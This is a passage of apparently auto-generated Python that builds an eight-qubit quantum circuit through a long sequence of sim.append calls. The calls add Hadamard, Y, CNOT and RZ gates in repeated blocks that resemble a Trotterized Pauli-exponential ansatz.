sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.233693, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.96871, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(5.442531, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
